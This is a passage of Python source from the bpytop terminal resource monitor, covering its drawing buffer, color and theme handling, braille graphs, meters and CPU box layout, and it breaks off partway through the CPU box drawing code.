@classmethod
def buffer(cls, name: str, *args: str, append: bool = False, now: bool = False, z: int = 100, only_save: bool = False, no_save: bool = False, once: bool = False):
string: str = ""
if name.startswith("+"):
name = name.lstrip("+")
append = True
if name.endswith("!"):
name = name.rstrip("!")
now = True
cls.save[name] = not no_save
cls.once[name] = once
if not name in cls.z_order or z != 100: cls.z_order[name] = z
if args: string = "".join(args)
if only_save:
if name not in cls.saved or not append: cls.saved[name] = ""
cls.saved[name] += string
else:
if name not in cls.strings or not append: cls.strings[name] = ""
cls.strings[name] += string
if now:
cls.out(name)
@classmethod
def out(cls, *names: str, clear = False):
out: str = ""
if not cls.strings: return
if names:
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in names and name in cls.strings:
out += cls.strings[name]
if cls.save[name]:
cls.saved[name] = cls.strings[name]
if clear or cls.once[name]:
cls.clear(name)
cls.now(out)
else:
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in cls.strings:
out += cls.strings[name]
if cls.save[name]:
cls.saved[name] = cls.strings[name]
if cls.once[name] and not clear:
cls.clear(name)
if clear:
cls.clear()
cls.now(out)
@classmethod
def saved_buffer(cls) -> str:
out: str = ""
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in cls.saved:
out += cls.saved[name]
return out
@classmethod
def clear(cls, *names, saved: bool = False):
if names:
for name in names:
if name in cls.strings:
del cls.strings[name]
if name in cls.save:
del cls.save[name]
if name in cls.once:
del cls.once[name]
if saved:
if name in cls.saved:
del cls.saved[name]
if name in cls.z_order:
del cls.z_order[name]
else:
cls.strings = {}
cls.save = {}
cls.once = {}
if saved:
cls.saved = {}
cls.z_order = {}
class Color:
'''Holds representations for a 24-bit color value
__init__(color, depth="fg", default=False)
-- color accepts 6 digit hexadecimal: string "#RRGGBB", 2 digit hexadecimal: string "#FF" or decimal RGB "255 255 255" as a string.
-- depth accepts "fg" or "bg"
__call__(*args) joins str arguments to a string and apply color
__str__ returns escape sequence to set color
__iter__ returns iteration over red, green and blue in integer values of 0-255.
* Values: .hexa: str | .dec: Tuple[int, int, int] | .red: int | .green: int | .blue: int | .depth: str | .escape: str
'''
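#* Example (illustrative): Color("#ff0000")("error") returns "error" wrapped in a red foreground escape (or a 256-color approximation when truecolor is off).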
hexa: str; dec: Tuple[int, int, int]; red: int; green: int; blue: int; depth: str; escape: str; default: bool
def __init__(self, color: str, depth: str = "fg", default: bool = False):
self.depth = depth
self.default = default
try:
if not color:
self.dec = (-1, -1, -1)
self.hexa = ""
self.red = self.green = self.blue = -1
self.escape = "\033[49m" if depth == "bg" and default else ""
return
elif color.startswith("#"):
self.hexa = color
if len(self.hexa) == 3:
self.hexa += self.hexa[1:3] + self.hexa[1:3]
c = int(self.hexa[1:3], base=16)
self.dec = (c, c, c)
elif len(self.hexa) == 7:
self.dec = (int(self.hexa[1:3], base=16), int(self.hexa[3:5], base=16), int(self.hexa[5:7], base=16))
else:
raise ValueError(f'Incorrectly formatted hexadecimal rgb string: {self.hexa}')
else:
c_t = tuple(map(int, color.split(" ")))
if len(c_t) == 3:
self.dec = c_t #type: ignore
else:
raise ValueError(f'RGB dec should be "0-255 0-255 0-255"')
ct = self.dec[0] + self.dec[1] + self.dec[2]
if ct > 255*3 or ct < 0:
raise ValueError(f'RGB values out of range: {color}')
except Exception as e:
errlog.exception(str(e))
self.escape = ""
return
if self.dec and not self.hexa: self.hexa = f'{hex(self.dec[0]).lstrip("0x").zfill(2)}{hex(self.dec[1]).lstrip("0x").zfill(2)}{hex(self.dec[2]).lstrip("0x").zfill(2)}'
if self.dec and self.hexa:
self.red, self.green, self.blue = self.dec
self.escape = f'\033[{38 if self.depth == "fg" else 48};2;{";".join(str(c) for c in self.dec)}m'
if not CONFIG.truecolor or LOW_COLOR:
self.escape = f'{self.truecolor_to_256(rgb=self.dec, depth=self.depth)}'
def __str__(self) -> str:
return self.escape
def __repr__(self) -> str:
return repr(self.escape)
def __iter__(self) -> Iterable:
for c in self.dec: yield c
def __call__(self, *args: str) -> str:
if len(args) < 1: return ""
return f'{self.escape}{"".join(args)}{getattr(Term, self.depth)}'
@staticmethod
def truecolor_to_256(rgb: Tuple[int, int, int], depth: str="fg") -> str:
out: str = ""
pre: str = f'\033[{"38" if depth == "fg" else "48"};5;'
greyscale: Tuple[int, int, int] = ( rgb[0] // 11, rgb[1] // 11, rgb[2] // 11 )
if greyscale[0] == greyscale[1] == greyscale[2]:
out = f'{pre}{232 + greyscale[0]}m'
else:
out = f'{pre}{round(rgb[0] / 51) * 36 + round(rgb[1] / 51) * 6 + round(rgb[2] / 51) + 16}m'
return out
@staticmethod
def escape_color(hexa: str = "", r: int = 0, g: int = 0, b: int = 0, depth: str = "fg") -> str:
"""Returns escape sequence to set color
* accepts either 6 digit hexadecimal hexa="#RRGGBB", 2 digit hexadecimal: hexa="#FF"
* or decimal RGB: r=0-255, g=0-255, b=0-255
* depth="fg" or "bg"
"""
dint: int = 38 if depth == "fg" else 48
color: str = ""
if hexa:
try:
if len(hexa) == 3:
c = int(hexa[1:], base=16)
if CONFIG.truecolor and not LOW_COLOR:
color = f'\033[{dint};2;{c};{c};{c}m'
else:
color = f'{Color.truecolor_to_256(rgb=(c, c, c), depth=depth)}'
elif len(hexa) == 7:
if CONFIG.truecolor and not LOW_COLOR:
color = f'\033[{dint};2;{int(hexa[1:3], base=16)};{int(hexa[3:5], base=16)};{int(hexa[5:7], base=16)}m'
else:
color = f'{Color.truecolor_to_256(rgb=(int(hexa[1:3], base=16), int(hexa[3:5], base=16), int(hexa[5:7], base=16)), depth=depth)}'
except ValueError as e:
errlog.exception(f'{e}')
else:
if CONFIG.truecolor and not LOW_COLOR:
color = f'\033[{dint};2;{r};{g};{b}m'
else:
color = f'{Color.truecolor_to_256(rgb=(r, g, b), depth=depth)}'
return color
@classmethod
def fg(cls, *args) -> str:
if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="fg")
else: return cls.escape_color(hexa=args[0], depth="fg")
@classmethod
def bg(cls, *args) -> str:
if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="bg")
else: return cls.escape_color(hexa=args[0], depth="bg")
class Colors:
'''Standard colors for menus and dialogs'''
default = Color("#cc")
white = Color("#ff")
red = Color("#bf3636")
green = Color("#68bf36")
blue = Color("#0fd7ff")
yellow = Color("#db8b00")
black_bg = Color("#00", depth="bg")
null = Color("")
class Theme:
'''__init__ accepts a dict containing { "color_element" : "color" }'''
themes: Dict[str, str] = {}
cached: Dict[str, Dict[str, str]] = { "Default" : DEFAULT_THEME }
current: str = ""
main_bg = main_fg = title = hi_fg = selected_bg = selected_fg = inactive_fg = proc_misc = cpu_box = mem_box = net_box = proc_box = div_line = temp_start = temp_mid = temp_end = cpu_start = cpu_mid = cpu_end = free_start = free_mid = free_end = cached_start = cached_mid = cached_end = available_start = available_mid = available_end = used_start = used_mid = used_end = download_start = download_mid = download_end = upload_start = upload_mid = upload_end = graph_text = meter_bg = process_start = process_mid = process_end = Colors.default
gradient: Dict[str, List[str]] = {
"temp" : [],
"cpu" : [],
"free" : [],
"cached" : [],
"available" : [],
"used" : [],
"download" : [],
"upload" : [],
"proc" : [],
"proc_color" : [],
"process" : [],
}
def __init__(self, theme: str):
self.refresh()
self._load_theme(theme)
def __call__(self, theme: str):
for k in self.gradient.keys(): self.gradient[k] = []
self._load_theme(theme)
def _load_theme(self, theme: str):
tdict: Dict[str, str]
if theme in self.cached:
tdict = self.cached[theme]
elif theme in self.themes:
tdict = self._load_file(self.themes[theme])
self.cached[theme] = tdict
else:
errlog.warning(f'No theme named "{theme}" found!')
theme = "Default"
CONFIG.color_theme = theme
tdict = DEFAULT_THEME
self.current = theme
#if CONFIG.color_theme != theme: CONFIG.color_theme = theme
if not "graph_text" in tdict and "inactive_fg" in tdict:
tdict["graph_text"] = tdict["inactive_fg"]
if not "meter_bg" in tdict and "inactive_fg" in tdict:
tdict["meter_bg"] = tdict["inactive_fg"]
if not "process_start" in tdict and "cpu_start" in tdict:
tdict["process_start"] = tdict["cpu_start"]
tdict["process_mid"] = tdict.get("cpu_mid", "")
tdict["process_end"] = tdict.get("cpu_end", "")
#* Get key names from DEFAULT_THEME dict to not leave any color unset if missing from theme dict
for item, value in DEFAULT_THEME.items():
default = item in ["main_fg", "main_bg"]
depth = "bg" if item in ["main_bg", "selected_bg"] else "fg"
if item in tdict:
setattr(self, item, Color(tdict[item], depth=depth, default=default))
else:
setattr(self, item, Color(value, depth=depth, default=default))
#* Create color gradients from one, two or three colors, 101 values indexed 0-100
self.proc_start, self.proc_mid, self.proc_end = self.main_fg, Colors.null, self.inactive_fg
self.proc_color_start, self.proc_color_mid, self.proc_color_end = self.inactive_fg, Colors.null, self.process_start
rgb: Dict[str, Tuple[int, int, int]]
colors: List[List[int]] = []
for name in self.gradient:
rgb = { "start" : getattr(self, f'{name}_start').dec, "mid" : getattr(self, f'{name}_mid').dec, "end" : getattr(self, f'{name}_end').dec }
colors = [ list(getattr(self, f'{name}_start')) ]
if rgb["end"][0] >= 0:
r = 50 if rgb["mid"][0] >= 0 else 100
for first, second in ["start", "mid" if r == 50 else "end"], ["mid", "end"]:
for i in range(r):
colors += [[rgb[first][n] + i * (rgb[second][n] - rgb[first][n]) // r for n in range(3)]]
if r == 100:
break
self.gradient[name] += [ Color.fg(*color) for color in colors ]
else:
c = Color.fg(*rgb["start"])
self.gradient[name] += [c] * 101
#* Set terminal colors
Term.fg = f'{self.main_fg}'
Term.bg = f'{self.main_bg}' if CONFIG.theme_background else "\033[49m"
Draw.now(self.main_fg, self.main_bg)
@classmethod
def refresh(cls):
'''Sets themes dict with names and paths to all found themes'''
cls.themes = { "Default" : "Default" }
try:
for d in (THEME_DIR, USER_THEME_DIR):
if not d: continue
for f in os.listdir(d):
if f.endswith(".theme"):
cls.themes[f'{"" if d == THEME_DIR else "+"}{f[:-6]}'] = f'{d}/{f}'
except Exception as e:
errlog.exception(str(e))
@staticmethod
def _load_file(path: str) -> Dict[str, str]:
'''Load a bashtop formatted theme file and return a dict'''
new_theme: Dict[str, str] = {}
try:
with open(path, "r") as f:
for line in f:
if not line.startswith("theme["): continue
key = line[6:line.find("]")]
s = line.find('"')
value = line[s + 1:line.find('"', s + 1)]
new_theme[key] = value
except Exception as e:
errlog.exception(str(e))
return new_theme
class Banner:
'''Holds the bpytop banner, .draw(line, [col=0], [center=False], [now=False])'''
out: List[str] = []
c_color: str = ""
length: int = 0
if not out:
for num, (color, color2, line) in enumerate(BANNER_SRC):
if len(line) > length: length = len(line)
out_var = ""
line_color = Color.fg(color)
line_color2 = Color.fg(color2)
line_dark = Color.fg(f'#{80 - num * 6}')
for n, letter in enumerate(line):
if letter == "█" and c_color != line_color:
if 5 < n < 25: c_color = line_color2
else: c_color = line_color
out_var += c_color
elif letter == " ":
letter = f'{Mv.r(1)}'
c_color = ""
elif letter != "█" and c_color != line_dark:
c_color = line_dark
out_var += line_dark
out_var += letter
out.append(out_var)
@classmethod
def draw(cls, line: int, col: int = 0, center: bool = False, now: bool = False):
out: str = ""
if center: col = Term.width // 2 - cls.length // 2
for n, o in enumerate(cls.out):
out += f'{Mv.to(line + n, col)}{o}'
out += f'{Term.fg}'
if now: Draw.out(out)
else: return out
class Symbol:
h_line: str = "─"
v_line: str = "│"
left_up: str = "┌"
right_up: str = "┐"
left_down: str = "└"
right_down: str = "┘"
title_left: str = "┤"
title_right: str = "├"
div_up: str = "┬"
div_down: str = "┴"
graph_up: Dict[float, str] = {
0.0 : " ", 0.1 : "⢀", 0.2 : "⢠", 0.3 : "⢰", 0.4 : "⢸",
1.0 : "⡀", 1.1 : "⣀", 1.2 : "⣠", 1.3 : "⣰", 1.4 : "⣸",
2.0 : "⡄", 2.1 : "⣄", 2.2 : "⣤", 2.3 : "⣴", 2.4 : "⣼",
3.0 : "⡆", 3.1 : "⣆", 3.2 : "⣦", 3.3 : "⣶", 3.4 : "⣾",
4.0 : "⡇", 4.1 : "⣇", 4.2 : "⣧", 4.3 : "⣷", 4.4 : "⣿"
}
graph_up_small = graph_up.copy()
graph_up_small[0.0] = "\033[1C"
graph_down: Dict[float, str] = {
0.0 : " ", 0.1 : "⠈", 0.2 : "⠘", 0.3 : "⠸", 0.4 : "⢸",
1.0 : "⠁", 1.1 : "⠉", 1.2 : "⠙", 1.3 : "⠹", 1.4 : "⢹",
2.0 : "⠃", 2.1 : "⠋", 2.2 : "⠛", 2.3 : "⠻", 2.4 : "⢻",
3.0 : "⠇", 3.1 : "⠏", 3.2 : "⠟", 3.3 : "⠿", 3.4 : "⢿",
4.0 : "⡇", 4.1 : "⡏", 4.2 : "⡟", 4.3 : "⡿", 4.4 : "⣿"
}
graph_down_small = graph_down.copy()
graph_down_small[0.0] = "\033[1C"
meter: str = "■"
up: str = "↑"
down: str = "↓"
left: str = "←"
right: str = "→"
enter: str = "↲"
ok: str = f'{Color.fg("#30ff50")}√{Color.fg("#cc")}'
fail: str = f'{Color.fg("#ff3050")}!{Color.fg("#cc")}'
class Graph:
'''Class for creating and adding to graphs
* __str__ : returns graph as a string
* add(value: int) : adds a value to graph and returns it as a string
* __call__ : same as add
'''
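#* Example (illustrative): Graph(40, 8, THEME.gradient["cpu"], [0, 25, 50, 100]) builds a braille graph; calling the instance with a new value advances the graph and returns the updated string.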
out: str
width: int
height: int
graphs: Dict[bool, List[str]]
colors: List[str]
invert: bool
max_value: int
color_max_value: int
offset: int
no_zero: bool
current: bool
last: int
symbol: Dict[float, str]
def __init__(self, width: int, height: int, color: Union[List[str], Color, None], data: List[int], invert: bool = False, max_value: int = 0, offset: int = 0, color_max_value: Union[int, None] = None, no_zero: bool = False):
self.graphs: Dict[bool, List[str]] = {False : [], True : []}
self.current: bool = True
self.width = width
self.height = height
self.invert = invert
self.offset = offset
self.no_zero = no_zero
if not data: data = [0]
if max_value:
self.max_value = max_value
data = [ min(100, (v + offset) * 100 // (max_value + offset)) for v in data ] #* Convert values to percentage values of max_value with max_value as ceiling
else:
self.max_value = 0
if color_max_value:
self.color_max_value = color_max_value
else:
self.color_max_value = self.max_value
if self.color_max_value and self.max_value:
color_scale = int(100.0 * self.max_value / self.color_max_value)
else:
color_scale = 100
self.colors: List[str] = []
if isinstance(color, list) and height > 1:
for i in range(1, height + 1): self.colors.insert(0, color[min(100, i * color_scale // height)]) #* Calculate colors of graph
if invert: self.colors.reverse()
elif isinstance(color, Color) and height > 1:
self.colors = [ f'{color}' for _ in range(height) ]
else:
if isinstance(color, list): self.colors = color
elif isinstance(color, Color): self.colors = [ f'{color}' for _ in range(101) ]
if self.height == 1:
self.symbol = Symbol.graph_down_small if invert else Symbol.graph_up_small
else:
self.symbol = Symbol.graph_down if invert else Symbol.graph_up
value_width: int = ceil(len(data) / 2)
filler: str = ""
if value_width > width: #* If the size of the given data set is bigger than the width of the graph, shrink the data set
data = data[-(width*2):]
value_width = ceil(len(data) / 2)
elif value_width < width: #* If the size of the given data set is smaller than the width of the graph, fill the graph with whitespace
filler = self.symbol[0.0] * (width - value_width)
if len(data) % 2: data.insert(0, 0)
for _ in range(height):
for b in [True, False]:
self.graphs[b].append(filler)
self._create(data, new=True)
def _create(self, data: List[int], new: bool = False):
h_high: int
h_low: int
value: Dict[str, int] = { "left" : 0, "right" : 0 }
val: int
side: str
#* Create the graph
for h in range(self.height):
h_high = round(100 * (self.height - h) / self.height) if self.height > 1 else 100
h_low = round(100 * (self.height - (h + 1)) / self.height) if self.height > 1 else 0
for v in range(len(data)):
if new: self.current = bool(v % 2) #* Switch between True and False graphs
if new and v == 0: self.last = 0
for val, side in [self.last, "left"], [data[v], "right"]: # type: ignore
if val >= h_high:
value[side] = 4
elif val <= h_low:
value[side] = 0
else:
if self.height == 1: value[side] = round(val * 4 / 100 + 0.5)
else: value[side] = round((val - h_low) * 4 / (h_high - h_low) + 0.1)
if self.no_zero and not (new and v == 0 and side == "left") and h == self.height - 1 and value[side] < 1: value[side] = 1
if new: self.last = data[v]
self.graphs[self.current][h] += self.symbol[float(value["left"] + value["right"] / 10)]
if data: self.last = data[-1]
self.out = ""
if self.height == 1:
self.out += f'{"" if not self.colors else (THEME.inactive_fg if self.last < 5 else self.colors[self.last])}{self.graphs[self.current][0]}'
elif self.height > 1:
for h in range(self.height):
if h > 0: self.out += f'{Mv.d(1)}{Mv.l(self.width)}'
self.out += f'{"" if not self.colors else self.colors[h]}{self.graphs[self.current][h if not self.invert else (self.height - 1) - h]}'
if self.colors: self.out += f'{Term.fg}'
def __call__(self, value: Union[int, None] = None) -> str:
if not isinstance(value, int): return self.out
self.current = not self.current
if self.height == 1:
if self.graphs[self.current][0].startswith(self.symbol[0.0]):
self.graphs[self.current][0] = self.graphs[self.current][0].replace(self.symbol[0.0], "", 1)
else:
self.graphs[self.current][0] = self.graphs[self.current][0][1:]
else:
for n in range(self.height):
self.graphs[self.current][n] = self.graphs[self.current][n][1:]
if self.max_value: value = (value + self.offset) * 100 // (self.max_value + self.offset) if value < self.max_value else 100
self._create([value])
return self.out
def add(self, value: Union[int, None] = None) -> str:
return self.__call__(value)
def __str__(self):
return self.out
def __repr__(self):
return repr(self.out)
class Graphs:
'''Holds all graphs and lists of graphs for dynamically created graphs'''
cpu: Dict[str, Graph] = {}
cores: List[Graph] = [NotImplemented] * THREADS
temps: List[Graph] = [NotImplemented] * (THREADS + 1)
net: Dict[str, Graph] = {}
detailed_cpu: Graph = NotImplemented
detailed_mem: Graph = NotImplemented
pid_cpu: Dict[int, Graph] = {}
disk_io: Dict[str, Dict[str, Graph]] = {}
class Meter:
'''Creates a percentage meter
__init__(value, width, theme, gradient_name) to create new meter
__call__(value) to set value and return meter as a string
__str__ returns last set meter as a string
'''
out: str
color_gradient: List[str]
color_inactive: Color
gradient_name: str
width: int
invert: bool
saved: Dict[int, str]
def __init__(self, value: int, width: int, gradient_name: str, invert: bool = False):
self.gradient_name = gradient_name
self.color_gradient = THEME.gradient[gradient_name]
self.color_inactive = THEME.meter_bg
self.width = width
self.saved = {}
self.invert = invert
self.out = self._create(value)
def __call__(self, value: Union[int, None]) -> str:
if not isinstance(value, int): return self.out
if value > 100: value = 100
elif value < 0: value = 0
if value in self.saved:
self.out = self.saved[value]
else:
self.out = self._create(value)
return self.out
def __str__(self) -> str:
return self.out
def __repr__(self):
return repr(self.out)
def _create(self, value: int) -> str:
if value > 100: value = 100
elif value < 0: value = 0
out: str = ""
for i in range(1, self.width + 1):
if value >= round(i * 100 / self.width):
out += f'{self.color_gradient[round(i * 100 / self.width) if not self.invert else round(100 - (i * 100 / self.width))]}{Symbol.meter}'
else:
out += self.color_inactive(Symbol.meter * (self.width + 1 - i))
break
else:
out += f'{Term.fg}'
if not value in self.saved:
self.saved[value] = out
return out
class Meters:
cpu: Meter
battery: Meter
mem: Dict[str, Union[Meter, Graph]] = {}
swap: Dict[str, Union[Meter, Graph]] = {}
disks_used: Dict[str, Meter] = {}
disks_free: Dict[str, Meter] = {}
class Box:
'''Box class with all attributes needed by the create_box() function'''
name: str
num: int = 0
boxes: List = []
view_modes: Dict[str, List] = {"full" : ["cpu", "mem", "net", "proc"], "stat" : ["cpu", "mem", "net"], "proc" : ["cpu", "proc"]}
view_mode: str
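#* Match the configured shown_boxes against a preset; the for/else falls through to a custom "user" view mode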
for view_mode in view_modes:
if sorted(CONFIG.shown_boxes.split(), key=str.lower) == view_modes[view_mode]:
break
else:
view_mode = "user"
view_modes["user"] = CONFIG.shown_boxes.split()
height_p: int
width_p: int
x: int
y: int
width: int
height: int
out: str
bg: str
_b_cpu_h: int
_b_mem_h: int
redraw_all: bool
buffers: List[str] = []
clock_on: bool = False
clock: str = ""
clock_len: int = 0
resized: bool = False
clock_custom_format: Dict[str, Any] = {
"/host" : os.uname()[1],
"/user" : os.environ.get("USER") or pwd.getpwuid(os.getuid())[0],
"/uptime" : "",
}
if clock_custom_format["/host"].endswith(".local"):
clock_custom_format["/host"] = clock_custom_format["/host"].replace(".local", "")
@classmethod
def calc_sizes(cls):
'''Calculate sizes of boxes'''
cls.boxes = CONFIG.shown_boxes.split()
for sub in cls.__subclasses__():
sub._calc_size() # type: ignore
sub.resized = True # type: ignore
@classmethod
def draw_update_ms(cls, now: bool = True):
if not "cpu" in cls.boxes: return
update_string: str = f'{CONFIG.update_ms}ms'
xpos: int = CpuBox.x + CpuBox.width - len(update_string) - 15
if not "+" in Key.mouse:
Key.mouse["+"] = [[xpos + 7 + i, CpuBox.y] for i in range(3)]
Key.mouse["-"] = [[CpuBox.x + CpuBox.width - 4 + i, CpuBox.y] for i in range(3)]
Draw.buffer("update_ms!" if now and not Menu.active else "update_ms",
f'{Mv.to(CpuBox.y, xpos)}{THEME.cpu_box(Symbol.h_line * 7, Symbol.title_left)}{Fx.b}{THEME.hi_fg("+")} ',
f'{THEME.title(update_string)} {THEME.hi_fg("-")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}', only_save=Menu.active, once=True)
if now and not Menu.active:
Draw.clear("update_ms")
if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
Draw.out("battery")
@classmethod
def draw_clock(cls, force: bool = False):
if not "cpu" in cls.boxes or not cls.clock_on: return
out: str = ""
if force: pass
elif Term.resized or strftime(CONFIG.draw_clock) == cls.clock: return
clock_string = cls.clock = strftime(CONFIG.draw_clock)
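#* Substitute the custom /host, /user and /uptime tags with their current values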
for custom in cls.clock_custom_format:
if custom in clock_string:
if custom == "/uptime": cls.clock_custom_format["/uptime"] = CpuCollector.uptime
clock_string = clock_string.replace(custom, cls.clock_custom_format[custom])
clock_len = len(clock_string[:(CpuBox.width-56)])
if cls.clock_len != clock_len and not CpuBox.resized:
out = f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(cls.clock_len//2))}{Fx.ub}{THEME.cpu_box}{Symbol.h_line * cls.clock_len}'
cls.clock_len = clock_len
now: bool = False if Menu.active else not force
out += (f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(clock_len//2))}{Fx.ub}{THEME.cpu_box}'
f'{Symbol.title_left}{Fx.b}{THEME.title(clock_string[:clock_len])}{Fx.ub}{THEME.cpu_box}{Symbol.title_right}{Term.fg}')
Draw.buffer("clock", out, z=1, now=now, once=not force, only_save=Menu.active)
if now and not Menu.active:
if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
Draw.out("battery")
@classmethod
def empty_bg(cls) -> str:
return (f'{Term.clear}' +
(f'{Banner.draw(Term.height // 2 - 10, center=True)}'
f'{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}[esc] Menu'
f'{Mv.r(25)}{Fx.i}Version: {VERSION}{Fx.ui}' if Term.height > 22 else "") +
f'{Mv.d(1)}{Mv.l(34)}{Fx.b}All boxes hidden!'
f'{Mv.d(1)}{Mv.l(17)}{Fx.b}[1] {Fx.ub}Toggle CPU box'
f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[2] {Fx.ub}Toggle MEM box'
f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[3] {Fx.ub}Toggle NET box'
f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[4] {Fx.ub}Toggle PROC box'
f'{Mv.d(1)}{Mv.l(19)}{Fx.b}[m] {Fx.ub}Cycle presets'
f'{Mv.d(1)}{Mv.l(17)}{Fx.b}[q] Quit {Fx.ub}{Term.bg}{Term.fg}')
@classmethod
def draw_bg(cls, now: bool = True):
'''Draw the outlines and titles of all boxes'''
out: str = ""
if not cls.boxes:
out = cls.empty_bg()
else:
out = "".join(sub._draw_bg() for sub in cls.__subclasses__()) # type: ignore
Draw.buffer("bg", out, now=now, z=1000, only_save=Menu.active, once=True)
cls.draw_update_ms(now=now)
if CONFIG.draw_clock: cls.draw_clock(force=True)
class SubBox:
box_x: int = 0
box_y: int = 0
box_width: int = 0
box_height: int = 0
box_columns: int = 0
column_size: int = 0
class CpuBox(Box, SubBox):
name = "cpu"
num = 1
x = 1
y = 1
height_p = 32
width_p = 100
min_w: int = 60
min_h: int = 8
resized: bool = True
redraw: bool = False
buffer: str = "cpu"
battery_percent: int = 1000
battery_secs: int = 0
battery_status: str = "Unknown"
old_battery_pos = 0
old_battery_len = 0
battery_path: Union[str, None] = ""
battery_clear: bool = False
battery_symbols: Dict[str, str] = {"Charging": "▲",
"Discharging": "▼",
"Full": "■",
"Not charging": "■"}
clock_block: bool = True
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
if not "cpu" in cls.boxes:
Box._b_cpu_h = 0
cls.width = Term.width
return
cpu = CpuCollector
height_p: int
if cls.boxes == ["cpu"]:
height_p = 100
else:
height_p = cls.height_p
cls.width = round(Term.width * cls.width_p / 100)
cls.height = round(Term.height * height_p / 100)
if cls.height < 8: cls.height = 8
Box._b_cpu_h = cls.height
#THREADS = 64
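#* Pick the widest per-core column layout that still fits next to the cpu graphs: column_size 2 fits usage and temperature graphs per core, 1 a shorter usage graph, 0 no per-core graphs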
cls.box_columns = ceil((THREADS + 1) / (cls.height - 5))
if cls.box_columns * (20 + 13 if cpu.got_sensors else 21) < cls.width - (cls.width // 3):
cls.column_size = 2
cls.box_width = (20 + 13 if cpu.got_sensors else 21) * cls.box_columns - ((cls.box_columns - 1) * 1)
elif cls.box_columns * (15 + 6 if cpu.got_sensors else 15) < cls.width - (cls.width // 3):
cls.column_size = 1
cls.box_width = (15 + 6 if cpu.got_sensors else 15) * cls.box_columns - ((cls.box_columns - 1) * 1)
elif cls.box_columns * (8 + 6 if cpu.got_sensors else 8) < cls.width - (cls.width // 3):
cls.column_size = 0
else:
cls.box_columns = (cls.width - cls.width // 3) // (8 + 6 if cpu.got_sensors else 8); cls.column_size = 0
if cls.column_size == 0: cls.box_width = (8 + 6 if cpu.got_sensors else 8) * cls.box_columns + 1
cls.box_height = ceil(THREADS / cls.box_columns) + 4
if cls.box_height > cls.height - 2: cls.box_height = cls.height - 2
cls.box_x = (cls.width - 1) - cls.box_width
cls.box_y = cls.y + ceil((cls.height - 2) / 2) - ceil(cls.box_height / 2) + 1
@classmethod
def _draw_bg(cls) -> str:
if not "cpu" in cls.boxes: return ""
if not "M" in Key.mouse:
Key.mouse["M"] = [[cls.x + 10 + i, cls.y] for i in range(6)]
return (f'{create_box(box=cls, line_color=THEME.cpu_box)}'
f'{Mv.to(cls.y, cls.x + 10)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("M")}{THEME.title("enu")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
f'{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title=CPU_NAME[:cls.box_width - 14] if not CONFIG.custom_cpu_name else CONFIG.custom_cpu_name[:cls.box_width - 14])}')
@classmethod
def battery_activity(cls) -> bool:
if not hasattr(psutil, "sensors_battery") or psutil.sensors_battery() == None:
if cls.battery_percent != 1000:
cls.battery_clear = True
return False
if cls.battery_path == "":
cls.battery_path = None
if os.path.isdir("/sys/class/power_supply"):
for directory in sorted(os.listdir("/sys/class/power_supply")):
if directory.startswith('BAT') or 'battery' in directory.lower():
cls.battery_path = f'/sys/class/power_supply/{directory}/'
break
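#* Compare percent, seconds left and charging status against the saved values; only report a change (and trigger a redraw) when one of them differs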
return_true: bool = False
percent: int = ceil(getattr(psutil.sensors_battery(), "percent", 0))
if percent != cls.battery_percent:
cls.battery_percent = percent
return_true = True
seconds: int = getattr(psutil.sensors_battery(), "secsleft", 0)
if seconds != cls.battery_secs:
cls.battery_secs = seconds
return_true = True
status: str = "not_set"
if cls.battery_path:
status = readfile(cls.battery_path + "status", default="not_set")
if status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == True:
status = "Charging" if cls.battery_percent < 100 else "Full"
elif status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == False:
status = "Discharging"
elif status == "not_set":
status = "Unknown"
if status != cls.battery_status:
cls.battery_status = status
return_true = True
return return_true or cls.resized or cls.redraw or Menu.active
@classmethod
def _draw_fg(cls):
if not "cpu" in cls.boxes: return
cpu = CpuCollector
if cpu.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
lavg: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
hh: int = ceil(h / 2)
hh2: int = h - hh
mid_line: bool = False
if not CONFIG.cpu_single_graph and CONFIG.cpu_graph_upper != CONFIG.cpu_graph_lower:
mid_line = True
if h % 2: hh = floor(h / 2)
else: hh2 -= 1
hide_cores: bool = (cpu.cpu_temp_only or not CONFIG.show_coretemp) and cpu.got_sensors
ct_width: int = (max(6, 6 * cls.column_size)) * hide_cores
if cls.resized or cls.redraw:
if not "m" in Key.mouse:
Key.mouse["m"] = [[cls.x + 16 + i, cls.y] for i in range(12)]
out_misc += f'{Mv.to(cls.y, cls.x + 16)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("m")}{THEME.title}ode:{Box.view_mode}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
Graphs.cpu["up"] = Graph(w - bw - 3, (h if CONFIG.cpu_single_graph else hh), THEME.gradient["cpu"], cpu.cpu_upper)
if not CONFIG.cpu_single_graph:
Graphs.cpu["down"] = Graph(w - bw - 3, hh2, THEME.gradient["cpu"], cpu.cpu_lower, invert=CONFIG.cpu_invert_lower)
Meters.cpu = Meter(cpu.cpu_usage[0][-1], bw - (21 if cpu.got_sensors else 9), "cpu")
if cls.column_size > 0 or ct_width > 0:
for n in range(THREADS):
